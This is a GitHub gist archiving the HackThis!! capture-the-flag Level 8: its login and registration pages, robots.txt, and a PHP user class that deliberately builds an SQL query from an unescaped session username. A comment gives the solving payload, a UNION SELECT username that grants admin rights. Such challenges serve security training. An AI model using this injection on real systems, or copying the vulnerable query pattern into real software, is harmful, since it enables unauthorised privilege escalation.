Last active
December 10, 2015 18:38
-
-
Save evandrix/4475901 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML> | |
| <html lang = "en"> | |
| <head> | |
| <title>HackThis!! - Capture the Flag</title> | |
| <meta charset = "UTF-8" /> | |
| <link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'> | |
| <link rel="stylesheet" href="/ctf/css/main.css"> | |
| <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> | |
| </head> | |
| <body> | |
| <div class='level_title'> | |
| Level 8 </div> | |
| <div class='nav'> | |
| <a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a> | |
| </div> | |
| <div class='level_container'> | |
| <div style='font-weight: bold; margin-bottom: 4px;'>Login</div> | |
| <form autocomplete="off" method="POST"> | |
| <input type="text" name="user" data-holder="Username"/><br/> | |
| <input type="password" name="pass" data-holder="Password"/><br/> | |
| <input type="submit" class="submit" value="Login"/> | |
| </form> | |
| <a href='/ctf/8?register'>Register</a> | <a href='#' class='view'>View Details</a> | |
| </div> | |
| <div class='level_code'> | |
| <a href='#' class='close'>[X]</a> | |
| <div class='code'> | |
| <code><span style="color: #000000"> | |
| donkeydiver is being very abusive,<br />but none of the admins are paying attention.<br />Please block his account but don't delete it.<br /><br /><span style="color: #0000BB"><?php<br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">include(</span><span style="color: #DD0000">"user.inc"</span><span style="color: #007700">);<br /> </span><span style="color: #0000BB">$user </span><span style="color: #007700">= new </span><span style="color: #0000BB">user</span><span style="color: #007700">();<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'register'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$tmp_user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /> </span><span style="color: #0000BB">$tmp_pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">register</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp_user</span><span style="color: #007700">, </span><span style="color: #0000BB">$tmp_pass</span><span style="color: #007700">);<br /> }<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'out'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">logout</span><span style="color: #007700">();<br /> }<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'login'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$tmp_user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /> </span><span style="color: #0000BB">$tmp_pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp_user</span><span style="color: #007700">, </span><span style="color: #0000BB">$tmp_pass</span><span style="color: #007700">);<br /> }<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">check</span><span style="color: #007700">();<br /><br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">if (</span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">loggedIn</span><span style="color: #007700">) {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'block'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">isAdmin</span><span style="color: #007700">()) {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">}<br /> } else {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">}<br /></span><span style="color: #0000BB">?><br /></span> | |
| </span> | |
| </code> </div> | |
| </div> | |
| <script type="text/javascript"> | |
| var _gaq = _gaq || []; | |
| _gaq.push(['_setAccount', 'UA-34026704-2']); | |
| _gaq.push(['_trackPageview']); | |
| (function() { | |
| var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | |
| ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | |
| var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | |
| })(); | |
| </script> | |
| <script src="/ctf/js/main.js"></script> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| donkeydiver is being very abusive, | |
| but none of the admins are paying attention. | |
| Please block his account but don't delete it. | |
| <?php | |
| // ... | |
| include("user.inc"); | |
| $user = new user(); | |
| if (isset($_GET['register'])) { | |
| $tmp_user = $_POST['user']; | |
| $tmp_pass = $_POST['pass']; | |
| $user->register($tmp_user, $tmp_pass); | |
| } | |
| if (isset($_GET['out'])) { | |
| $user->logout(); | |
| } | |
| if (isset($_GET['login'])) { | |
| $tmp_user = $_POST['user']; | |
| $tmp_pass = $_POST['pass']; | |
| $user->login($tmp_user, $tmp_pass); | |
| } | |
| $user->check(); | |
| // ... | |
| if ($user->loggedIn) { | |
| // ... | |
| if (isset($_GET['block']) && $user->isAdmin()) { | |
| // ... | |
| } | |
| } else { | |
| // ... | |
| } | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML> | |
| <html lang = "en"> | |
| <head> | |
| <title>HackThis!! - Capture the Flag</title> | |
| <meta charset = "UTF-8" /> | |
| <link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'> | |
| <link rel="stylesheet" href="/ctf/css/main.css"> | |
| <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> | |
| </head> | |
| <body> | |
| <div class='level_title'> | |
| Level 8 </div> | |
| <div class='nav'> | |
| <a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a> | |
| </div> | |
| <div class='level_container'> | |
| <div style='font-weight: bold; margin-bottom: 4px;'>Registration</div> | |
| <form autocomplete="off" method="POST"> | |
| <input type="text" name="user" data-holder="Username"/><br/> | |
| <input type="password" name="pass" data-holder="Password"/><br/> | |
| <input type="password" name="pass2" data-holder="Password"/><br/> | |
| <input type="submit" class="submit" value="Register"/> | |
| </form> | |
| <a href='/ctf/8'>Login</a> | <a href='#' class='view'>View Details</a> | |
| </div> | |
| <div class='level_code'> | |
| <a href='#' class='close'>[X]</a> | |
| <div class='code'> | |
| <code><span style="color: #000000"> | |
| donkeydiver is being very abusive,<br />but none of the admins are paying attention.<br />Please block his account but don't delete it.<br /><br /><span style="color: #0000BB"><?php<br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">include(</span><span style="color: #DD0000">"user.inc"</span><span style="color: #007700">);<br /> </span><span style="color: #0000BB">$user </span><span style="color: #007700">= new </span><span style="color: #0000BB">user</span><span style="color: #007700">();<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'register'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$tmp_user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /> </span><span style="color: #0000BB">$tmp_pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">register</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp_user</span><span style="color: #007700">, </span><span style="color: #0000BB">$tmp_pass</span><span style="color: #007700">);<br /> }<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'out'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">logout</span><span style="color: #007700">();<br /> }<br /><br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'login'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$tmp_user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /> </span><span style="color: #0000BB">$tmp_pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp_user</span><span style="color: #007700">, </span><span style="color: #0000BB">$tmp_pass</span><span style="color: #007700">);<br /> }<br /><br /> </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">check</span><span style="color: #007700">();<br /><br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">if (</span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">loggedIn</span><span style="color: #007700">) {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'block'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">$user</span><span style="color: #007700">-></span><span style="color: #0000BB">isAdmin</span><span style="color: #007700">()) {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">}<br /> } else {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">}<br /></span><span style="color: #0000BB">?><br /></span> | |
| </span> | |
| </code> </div> | |
| </div> | |
| <script type="text/javascript"> | |
| var _gaq = _gaq || []; | |
| _gaq.push(['_setAccount', 'UA-34026704-2']); | |
| _gaq.push(['_trackPageview']); | |
| (function() { | |
| var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | |
| ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | |
| var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | |
| })(); | |
| </script> | |
| <script src="/ctf/js/main.js"></script> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| User-agent: * | |
| Allow: / | |
| Disallow: /inbox/ | |
| Disallow: /levels/ | |
| Disallow: /levels/extras/userpass.txt | |
| Disallow: /users/ | |
| Disallow: /ctf/8/php/* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // @ http://www.hackthis.co.uk/ctf/8/php/user.inc | |
| class user { | |
| public function __get($property) { | |
| if (property_exists($this, $property)) { | |
| return $this->$property; | |
| } | |
| } | |
| public function login($usr, $pass) { | |
| $user = sqlite_escape_string($usr); | |
| $pass = hash('sha256', $pass); | |
| $query = "SELECT username FROM users WHERE username = '{$user}' AND password = '{$pass}' LIMIT 1"; | |
| $q = $database->query($query, SQLITE_ASSOC, $error); | |
| if (!$error && $q->numRows() > 0) { | |
| $_SESSION["user"] = $usr; | |
| return true; | |
| } else { | |
| return false; | |
| } | |
| } | |
| public function register($user, $pass) { | |
| $user = sqlite_escape_string($user); | |
| $pass = hash('sha256', $pas); | |
| if ($_POST['pass'] != $pass) { | |
| $error = true; | |
| } else { | |
| $query = "INSERT INTO 'users' VALUES ('{$user}','{$pass}', 0);"; | |
| if (!$database->queryExec($query, $error)) { | |
| return true; | |
| } | |
| } | |
| return false; | |
| } | |
| public function logout() { | |
| unset($_SESSION["user"]); | |
| } | |
| public function check() { | |
| if (!isset($_SESSION["user"])) | |
| return false; | |
| $this->loggedIn = true; | |
| $this->user = $_SESSION["user"]; | |
| $query = "SELECT username, admin FROM users WHERE username = '{$this->user}' LIMIT 1"; | |
| $q = $database->query($query, SQLITE_ASSOC, $error); | |
| if (!$error && $q->numRows() > 0) { | |
| $r = $q->fetch(); | |
| $this->admin = $r['admin']; | |
| } | |
| } | |
| public function checkAdmin() { | |
| // ... | |
| } | |
| } | |
| ?> |
Author
evandrix
commented
Jan 8, 2013
- Create account O and O' union select 1,1 AS admin--
- Login as O' union select 1,1 AS admin--
thx :D
np. we're all here to learn
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment